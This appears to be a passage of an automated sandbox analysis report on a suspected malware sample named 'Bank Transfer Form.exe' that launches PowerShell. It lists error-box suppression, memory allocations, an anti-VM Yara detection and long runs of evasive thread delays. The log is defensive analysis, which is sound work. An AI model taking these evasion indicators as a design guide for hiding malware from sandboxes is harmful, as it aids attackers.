Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Bank Transfer Form.exe PID: 7404, type: MEMORYSTR

Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Memory allocated: 1140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Memory allocated: 2D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Memory allocated: 2B90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Memory allocated: 9480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Memory allocated: A480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Memory allocated: A6A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Memory allocated: 7900000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Memory allocated: BA20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Memory allocated: CA20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Memory allocated: DA20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Memory allocated: 1800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Memory allocated: 3280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Memory allocated: 5280000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 239867	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 239750	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 239640	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 239507	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 239405	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 239297	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 239187	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 239074	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 238953	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 238843	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 238734	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 238625	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 238485	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 238359	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 238235	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 238109	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 237981	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597575	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596920	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596474	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596249	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595374	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 594609	Jump to behavior

Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Window / User API: threadDelayed 1241	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Window / User API: threadDelayed 1837	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6860	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2603	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Window / User API: threadDelayed 1254	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Window / User API: threadDelayed 8605	Jump to behavior

Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -239867s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -239750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -239640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -239507s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -239405s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -239297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -239187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -239074s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -238953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -238843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -238734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -238625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -238485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -238359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -238235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -238109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440	Thread sleep time: -237981s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7424	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7768	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7792	Thread sleep count: 1254 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7792	Thread sleep count: 8605 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -598999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -598124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -597796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -597575s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -597249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -596920s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -596474s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -596249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -596140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -595921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -595593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -595484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -595374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -595265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -595156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -595046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -594937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -594718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788	Thread sleep time: -594609s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 239867	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 239750	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 239640	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 239507	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 239405	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 239297	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 239187	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 239074	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 238953	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 238843	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 238734	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 238625	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 238485	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 238359	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 238235	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 238109	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 237981	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 600000	Jump to behavior
